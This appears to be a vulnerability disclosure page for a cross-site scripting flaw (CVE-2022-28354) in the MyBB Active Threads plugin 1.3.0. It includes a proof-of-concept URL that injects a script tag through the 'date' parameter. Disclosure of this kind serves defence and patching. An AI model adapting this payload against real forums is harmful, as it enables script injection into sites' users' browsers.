Headline
MyBB Active Threads 1.3.0 Cross Site Scripting
MyBB Active Threads plugin version 1.3.0 suffers from a cross site scripting vulnerability.
Change Mirror Download
# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting# Date: February 9, 2022# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336# Version: 1.3.0# Tested On: Windows 10# CVE: CVE-2022-28354Description:This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.Proof of Concept:activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script>Related news
CVE-2022-28354: Extend MyBB - Error
In the Active Threads Plugin 1.3.0 for MyBB, the activethreads.php date parameter is vulnerable to XSS when setting a time period.